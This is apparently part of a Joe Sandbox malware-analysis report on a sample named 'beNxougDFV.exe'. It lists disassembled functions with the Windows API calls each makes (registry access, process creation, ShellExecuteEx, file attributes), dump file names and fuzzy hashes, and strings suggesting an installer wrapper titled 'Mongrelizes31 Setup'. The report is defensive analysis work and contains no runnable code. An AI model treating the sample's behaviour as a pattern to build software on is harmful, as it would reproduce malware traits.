RegOpenKeyExA.KERNELBASE(00000000,?,00000000,?,?,?,?,?,00405E43,?,?,?,?,00000002,: Completed), ref: 00405DD9

Memory Dump Source

Source File: 00000000.00000002.1390012497.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1389993034.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1390064349.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1390083947.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1390083947.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1390083947.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1390083947.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1390083947.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1390185529.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_beNxougDFV.jbxd

Similarity

API ID: Open
String ID:
API String ID: 71445658-0
Opcode ID: 688c0e3dac6200a4dcf5f70578aed2939ff3afbafb421f65443b8838c7a2b092
Instruction ID: 1bb1e450acb1cec7aaebab1a7e88d6b79e3e17733f6ed9cfc6e3f6d6de5b0954
Opcode Fuzzy Hash: 688c0e3dac6200a4dcf5f70578aed2939ff3afbafb421f65443b8838c7a2b092
Instruction Fuzzy Hash: D9D0123214024EBBDF115F909C05FAB3B2DEF04314F108827FE06A4090D375D530AB65

Function 0040159D Relevance: 1.5, APIs: 1, Instructions: 18COMMON

Download Yara Rule

APIs

SetFileAttributesA.KERNELBASE(00000000,?,000000F0), ref: 004015A8

Memory Dump Source

Source File: 00000000.00000002.1390012497.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1389993034.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1390064349.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1390083947.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1390083947.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1390083947.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1390083947.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1390083947.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1390185529.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_beNxougDFV.jbxd

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: 9ad3368f28842b63240b43095d0b068e3f646c1f23794f7f91dbfbeff94efc4c
Instruction ID: e41715f0e6a8bf2c44c365c92f64d23a332030a9f95fc047605520203e95b8fc
Opcode Fuzzy Hash: 9ad3368f28842b63240b43095d0b068e3f646c1f23794f7f91dbfbeff94efc4c
Instruction Fuzzy Hash: 9BD012B6708111ABCB10DFA8AA4869D77A49B40325B308137D515F21D0E2B9C9456719

Function 0040403C Relevance: 1.5, APIs: 1, Instructions: 9windowCOMMON

Download Yara Rule

APIs

SendMessageA.USER32(00010460,00000000,00000000,00000000), ref: 0040404E

Memory Dump Source

Source File: 00000000.00000002.1390012497.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1389993034.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1390064349.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1390083947.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1390083947.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1390083947.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1390083947.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1390083947.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1390185529.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_beNxougDFV.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: 875450fc840247aea6e73403ee44149e02d5474b467ece0a28835bfda1230da9
Instruction ID: a420b78244073386fdaf02eaad45271dfd1dc05eac8f2b2552ccdd106ab2ed6e
Opcode Fuzzy Hash: 875450fc840247aea6e73403ee44149e02d5474b467ece0a28835bfda1230da9
Instruction Fuzzy Hash: 70C09B717443007BFA31DB509D49F077758A750B00F5584357320F50D0C6B4E451D62D

Function 00403173 Relevance: 1.5, APIs: 1, Instructions: 6COMMON

Download Yara Rule

APIs

SetFilePointer.KERNELBASE(00000000,00000000,00000000,00402F0F,?), ref: 00403181

Memory Dump Source

Source File: 00000000.00000002.1390012497.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1389993034.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1390064349.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1390083947.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1390083947.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1390083947.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1390083947.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1390083947.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1390185529.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_beNxougDFV.jbxd

Similarity

API ID: FilePointer
String ID:
API String ID: 973152223-0
Opcode ID: 0070af3e33726fe8c9f5218e9eb5d27e4edbe1e9193197dd8736a9b9f47decae
Instruction ID: 49fdcfdf8b1973cd13611e97ba0bfafd8618b6cb304eeeee9131019f9f046fb0
Opcode Fuzzy Hash: 0070af3e33726fe8c9f5218e9eb5d27e4edbe1e9193197dd8736a9b9f47decae
Instruction Fuzzy Hash: 03B01271644200BFDA214F00DF05F057B21A790700F10C030B748380F082712420EB4D

Function 00405611 Relevance: 1.5, APIs: 1, Instructions: 6COMMON

Download Yara Rule

APIs

ShellExecuteExA.SHELL32(?,00404415,?), ref: 00405620

Memory Dump Source

Source File: 00000000.00000002.1390012497.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1389993034.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1390064349.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1390083947.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1390083947.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1390083947.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1390083947.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1390083947.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1390185529.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_beNxougDFV.jbxd

Similarity

API ID: ExecuteShell
String ID:
API String ID: 587946157-0
Opcode ID: 2982c174e10af5d4c40be735a028cd5bbc0670b812c5b1d1bedef84de471004d
Instruction ID: 740202cceb9cd72bfbe3504c5fe3e084c22a481b72cb9b9ac8673d70f1f22f9b
Opcode Fuzzy Hash: 2982c174e10af5d4c40be735a028cd5bbc0670b812c5b1d1bedef84de471004d
Instruction Fuzzy Hash: 45C092B2404200DFE301CF90CB58F077BE8AB55306F028054E1849A2A0C378A800CB7A

Function 00404025 Relevance: 1.5, APIs: 1, Instructions: 6windowCOMMON

Download Yara Rule

APIs

SendMessageA.USER32(00000028,?,00000001,00403E55), ref: 00404033

Memory Dump Source

Source File: 00000000.00000002.1390012497.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1389993034.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1390064349.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1390083947.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1390083947.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1390083947.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1390083947.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1390083947.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1390185529.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_beNxougDFV.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: 3bdb3c033a7d800f3f5983e71921b41162ac414239058931643885a1338ef954
Instruction ID: 7b5ccc39adf6f72de5191684d4495c6b43ffe58f78915606d69c4a7e6f44d702
Opcode Fuzzy Hash: 3bdb3c033a7d800f3f5983e71921b41162ac414239058931643885a1338ef954
Instruction Fuzzy Hash: F3B092B5684200BAEE224B40DD09F457EA2E7A4702F008024B300240B0C6B200A1DB19

Function 00404012 Relevance: 1.5, APIs: 1, Instructions: 4COMMON

Download Yara Rule

APIs

KiUserCallbackDispatcher.NTDLL(?,00403DEE), ref: 0040401C

Memory Dump Source

Source File: 00000000.00000002.1390012497.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1389993034.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1390064349.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1390083947.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1390083947.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1390083947.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1390083947.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1390083947.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1390185529.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_beNxougDFV.jbxd

Similarity

API ID: CallbackDispatcherUser
String ID:
API String ID: 2492992576-0
Opcode ID: 12c11760972377b051275edfb0549e2da63da5a0a3d5c66f9a0e944dd115ee42
Instruction ID: 627edf876ec6fe827e8ded8b6e0f84c3e1bff33d3b07c91bc4a796ca35ff40dd
Opcode Fuzzy Hash: 12c11760972377b051275edfb0549e2da63da5a0a3d5c66f9a0e944dd115ee42
Instruction Fuzzy Hash: CAA00176808101ABCB029B50FF09D9ABF62ABA5705B028435E65694174C7325865FF1A

Function 00401EDB Relevance: 1.3, APIs: 1, Instructions: 37COMMON

Download Yara Rule

APIs

Part of subcall function 00405056: lstrlenA.KERNEL32(Completed,00000000,0040E8C0,00000000,?,?,?,?,?,?,?,?,?,004030B1,00000000,?), ref: 0040508F
Part of subcall function 00405056: lstrlenA.KERNEL32(004030B1,Completed,00000000,0040E8C0,00000000,?,?,?,?,?,?,?,?,?,004030B1,00000000), ref: 0040509F
Part of subcall function 00405056: lstrcatA.KERNEL32(Completed,004030B1,004030B1,Completed,00000000,0040E8C0,00000000), ref: 004050B2
Part of subcall function 00405056: SetWindowTextA.USER32(Completed,Completed), ref: 004050C4
Part of subcall function 00405056: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 004050EA
Part of subcall function 00405056: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00405104
Part of subcall function 00405056: SendMessageA.USER32(?,00001013,?,00000000), ref: 00405112

Part of subcall function 004055CE: CreateProcessA.KERNELBASE(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,00421510,Error launching installer), ref: 004055F7
Part of subcall function 004055CE: CloseHandle.KERNEL32(?), ref: 00405604

CloseHandle.KERNEL32(?,?,?,?,?,?), ref: 00401F20

Part of subcall function 0040633C: WaitForSingleObject.KERNEL32(?,00000064), ref: 0040634D
Part of subcall function 0040633C: GetExitCodeProcess.KERNEL32(?,?), ref: 0040636F

Part of subcall function 00405E8D: wsprintfA.USER32 ref: 00405E9A

Memory Dump Source

Source File: 00000000.00000002.1390012497.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1389993034.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1390064349.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1390083947.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1390083947.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1390083947.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1390083947.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1390083947.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1390185529.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_beNxougDFV.jbxd

Similarity

API ID: MessageSend$CloseHandleProcesslstrlen$CodeCreateExitObjectSingleTextWaitWindowlstrcatwsprintf
String ID:
API String ID: 2972824698-0
Opcode ID: b0a501a9eafe77c97c2c496f47c0dc6ba7aad14b3677605ff562daff4fba8fe6
Instruction ID: 17f7953f0d5b7b21d2e535c202f5bbb1bf051249d0315c8d96c64ca666d5043c
Opcode Fuzzy Hash: b0a501a9eafe77c97c2c496f47c0dc6ba7aad14b3677605ff562daff4fba8fe6
Instruction Fuzzy Hash: FCF0BB71A05121ABCB20BF654D495EF66A4DF81314B10057BFA01B21D1C77C4E4146BE

Non-executed Functions

Function 004049D3 Relevance: 63.5, APIs: 33, Strings: 3, Instructions: 481windowmemoryCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,000003F9), ref: 004049EB
GetDlgItem.USER32(?,00000408), ref: 004049F6
GlobalAlloc.KERNEL32(00000040,?), ref: 00404A40
LoadBitmapA.USER32(0000006E), ref: 00404A53
SetWindowLongA.USER32(?,000000FC,00404FCA), ref: 00404A6C
ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404A80
ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 00404A92
SendMessageA.USER32(?,00001109,00000002), ref: 00404AA8
SendMessageA.USER32(?,0000111C,00000000,00000000), ref: 00404AB4
SendMessageA.USER32(?,0000111B,00000010,00000000), ref: 00404AC6
DeleteObject.GDI32(00000000), ref: 00404AC9
SendMessageA.USER32(?,00000143,00000000,00000000), ref: 00404AF4
SendMessageA.USER32(?,00000151,00000000,00000000), ref: 00404B00
SendMessageA.USER32(?,00001100,00000000,?), ref: 00404B95
SendMessageA.USER32(?,0000110A,00000003,00000000), ref: 00404BC0
SendMessageA.USER32(?,00001100,00000000,?), ref: 00404BD4
GetWindowLongA.USER32(?,000000F0), ref: 00404C03
SetWindowLongA.USER32(?,000000F0,00000000), ref: 00404C11
ShowWindow.USER32(?,00000005), ref: 00404C22
SendMessageA.USER32(?,00000419,00000000,?), ref: 00404D1F
SendMessageA.USER32(?,00000147,00000000,00000000), ref: 00404D84
SendMessageA.USER32(?,00000150,00000000,00000000), ref: 00404D99
SendMessageA.USER32(?,00000420,00000000,00000020), ref: 00404DBD
SendMessageA.USER32(?,00000200,00000000,00000000), ref: 00404DDD
ImageList_Destroy.COMCTL32(00000000), ref: 00404DF2
GlobalFree.KERNEL32(00000000), ref: 00404E02
SendMessageA.USER32(?,0000014E,00000000,00000000), ref: 00404E7B
SendMessageA.USER32(?,00001102,?,?), ref: 00404F24
SendMessageA.USER32(?,0000110D,00000000,00000008), ref: 00404F33
InvalidateRect.USER32(?,00000000,00000001), ref: 00404F53
ShowWindow.USER32(?,00000000), ref: 00404FA1
GetDlgItem.USER32(?,000003FE), ref: 00404FAC
ShowWindow.USER32(00000000), ref: 00404FB3

Strings

, xrefs: 00404F8B
M, xrefs: 00404B7C
N, xrefs: 00404C5D

Memory Dump Source

Source File: 00000000.00000002.1390012497.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1389993034.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1390064349.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1390083947.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1390083947.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1390083947.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1390083947.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1390083947.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1390185529.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_beNxougDFV.jbxd

Similarity

API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
String ID: $M$N
API String ID: 1638840714-813528018
Opcode ID: 5d7cd4127e08cc7e18dc449df1c62f71d17ea125050121c4d20db61d323595a9
Instruction ID: 4638a2be7f0938753f9a717370e01017d92af631219061991dd3498ab54a35db
Opcode Fuzzy Hash: 5d7cd4127e08cc7e18dc449df1c62f71d17ea125050121c4d20db61d323595a9
Instruction Fuzzy Hash: 60027EB0900209AFEF109F54DC85AAE7BB5FB84315F10817AF615BA2E1C7789E42DF58

Function 00404460 Relevance: 24.8, APIs: 10, Strings: 4, Instructions: 274stringCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,000003FB), ref: 004044AF
SetWindowTextA.USER32(00000000,?), ref: 004044D9
SHBrowseForFolderA.SHELL32(?,0041F0E0,?), ref: 0040458A
CoTaskMemFree.OLE32(00000000), ref: 00404595
lstrcmpiA.KERNEL32(: Completed,Mongrelizes31 Setup: Completed), ref: 004045C7
lstrcatA.KERNEL32(?,: Completed), ref: 004045D3
SetDlgItemTextA.USER32(?,000003FB,?), ref: 004045E5

Part of subcall function 0040562F: GetDlgItemTextA.USER32(?,?,00000400,0040461C), ref: 00405642

Part of subcall function 00406199: CharNextA.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\beNxougDFV.exe",774D3410,C:\Users\user\AppData\Local\Temp\,00000000,00403196,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004033CF,?,00000006,00000008,0000000A), ref: 004061F1
Part of subcall function 00406199: CharNextA.USER32(?,?,?,00000000,?,00000006,00000008,0000000A), ref: 004061FE
Part of subcall function 00406199: CharNextA.USER32(?,"C:\Users\user\Desktop\beNxougDFV.exe",774D3410,C:\Users\user\AppData\Local\Temp\,00000000,00403196,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004033CF,?,00000006,00000008,0000000A), ref: 00406203
Part of subcall function 00406199: CharPrevA.USER32(?,?,774D3410,C:\Users\user\AppData\Local\Temp\,00000000,00403196,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004033CF,?,00000006,00000008,0000000A), ref: 00406213

GetDiskFreeSpaceA.KERNEL32(0041ECD8,?,?,0000040F,?,0041ECD8,0041ECD8,?,00000001,0041ECD8,?,?,000003FB,?), ref: 004046A3
MulDiv.KERNEL32(?,0000040F,00000400), ref: 004046BE

Part of subcall function 00404817: lstrlenA.KERNEL32(Mongrelizes31 Setup: Completed,Mongrelizes31 Setup: Completed,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,00404732,000000DF,00000000,00000400,?), ref: 004048B5
Part of subcall function 00404817: wsprintfA.USER32 ref: 004048BD
Part of subcall function 00404817: SetDlgItemTextA.USER32(?,Mongrelizes31 Setup: Completed), ref: 004048D0

Strings

Mongrelizes31 Setup: Completed, xrefs: 0040455D, 004045C0
C:\Users\user\AppData\Local\unshabbily, xrefs: 004045B0
: Completed, xrefs: 004045C1, 004045C6, 004045D1
A, xrefs: 00404583

Memory Dump Source

Source File: 00000000.00000002.1390012497.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1389993034.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1390064349.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1390083947.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1390083947.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1390083947.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1390083947.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1390083947.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1390185529.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_beNxougDFV.jbxd

Similarity

API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
String ID: : Completed$A$C:\Users\user\AppData\Local\unshabbily$Mongrelizes31 Setup: Completed
API String ID: 2624150263-1557839200
Opcode ID: ef32ee5c924519dd82d117a465dafaf8dcd4de5cfa9c843c3c8ed1b6bd1752c3
Instruction ID: 5dd75e317128adb7bedb8be6abecdb1ea93c725c3d3faa56fa834c848e6f6950
Opcode Fuzzy Hash: ef32ee5c924519dd82d117a465dafaf8dcd4de5cfa9c843c3c8ed1b6bd1752c3
Instruction Fuzzy Hash: 4BA19FF1900209ABDB11AFA5CC45BAFB7B8EF85314F10843BF611B62D1DB7C99418B69

Function 004020CB Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 139comCOMMON

Download Yara Rule

APIs

CoCreateInstance.OLE32(00407408,?,00000001,004073F8,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 0040214D
MultiByteToWideChar.KERNEL32(?,?,?,000000FF,?,00000400,?,00000001,004073F8,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 004021FC

Strings

C:\Users\user\AppData\Local\unshabbily, xrefs: 0040218D

Memory Dump Source

Source File: 00000000.00000002.1390012497.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1389993034.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1390064349.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1390083947.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1390083947.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1390083947.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1390083947.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1390083947.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1390185529.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_beNxougDFV.jbxd

Similarity

API ID: ByteCharCreateInstanceMultiWide
String ID: C:\Users\user\AppData\Local\unshabbily
API String ID: 123533781-4280797776
Opcode ID: e3b45c08e4ce457a64ba278d5508bdaa5c8a437ab77814b71e65f4811fac46df
Instruction ID: 27b6dc01e21a21dcf175964b2ce54e528eb66c3f275abda499c4f6713b6e0615
Opcode Fuzzy Hash: e3b45c08e4ce457a64ba278d5508bdaa5c8a437ab77814b71e65f4811fac46df
Instruction Fuzzy Hash: 355136B5A00208BFCF10DFE4C988A9DBBB5EF48314F2045AAF915EB2D1DA799941CF54

Function 004026F8 Relevance: 1.5, APIs: 1, Instructions: 29fileCOMMON

Download Yara Rule

APIs

FindFirstFileA.KERNEL32(00000000,?,00000002), ref: 00402707

Memory Dump Source

Source File: 00000000.00000002.1390012497.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1389993034.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1390064349.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1390083947.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1390083947.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1390083947.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1390083947.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1390083947.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1390185529.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_beNxougDFV.jbxd

Similarity

API ID: FileFindFirst
String ID:
API String ID: 1974802433-0
Opcode ID: 86462296798bcc5c7116dc0b8927a48604f8bac83b6720eb84ded3fe255ec0fc
Instruction ID: 8315facf8ced128c6c50566814b57074d619fda0e5ca52ae4c33e0c7423f4127
Opcode Fuzzy Hash: 86462296798bcc5c7116dc0b8927a48604f8bac83b6720eb84ded3fe255ec0fc
Instruction Fuzzy Hash: E8F0ECB2704111AFD710EB749D49AFE7778DB11324F20057BE645F20C1D6B88A45DB2A

Function 00404139 Relevance: 37.0, APIs: 19, Strings: 2, Instructions: 202windowstringCOMMON

Download Yara Rule

APIs

CheckDlgButton.USER32(00000000,-0000040A,00000001), ref: 004041C4
GetDlgItem.USER32(00000000,000003E8), ref: 004041D8
SendMessageA.USER32(00000000,0000045B,00000001,00000000), ref: 004041F6
GetSysColor.USER32(?), ref: 00404207
SendMessageA.USER32(00000000,00000443,00000000,?), ref: 00404216
SendMessageA.USER32(00000000,00000445,00000000,04010000), ref: 00404225
lstrlenA.KERNEL32(?), ref: 00404228
SendMessageA.USER32(00000000,00000435,00000000,00000000), ref: 00404237
SendMessageA.USER32(00000000,00000449,?,00000110), ref: 0040424C
GetDlgItem.USER32(?,0000040A), ref: 004042AE
SendMessageA.USER32(00000000), ref: 004042B1
GetDlgItem.USER32(?,000003E8), ref: 004042DC
SendMessageA.USER32(00000000,0000044B,00000000,00000201), ref: 0040431C
LoadCursorA.USER32(00000000,00007F02), ref: 0040432B
SetCursor.USER32(00000000), ref: 00404334
LoadCursorA.USER32(00000000,00007F00), ref: 0040434A
SetCursor.USER32(00000000), ref: 0040434D
SendMessageA.USER32(00000111,00000001,00000000), ref: 00404379
SendMessageA.USER32(00000010,00000000,00000000), ref: 0040438D

Strings

N, xrefs: 004042CA
: Completed, xrefs: 00404307

Memory Dump Source

Source File: 00000000.00000002.1390012497.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1389993034.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1390064349.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1390083947.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1390083947.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1390083947.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1390083947.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1390083947.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1390185529.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_beNxougDFV.jbxd

Similarity

API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorlstrlen
String ID: : Completed$N
API String ID: 3103080414-2140067464
Opcode ID: feecafc40baf01a00ddfc5a4ad2d6f47f6ba1c3b7388df2095feb28ad013f924
Instruction ID: 7162b40555158b22622c6e9d00efc6f9eaf6d98589edfbec15a783eb0e256f30
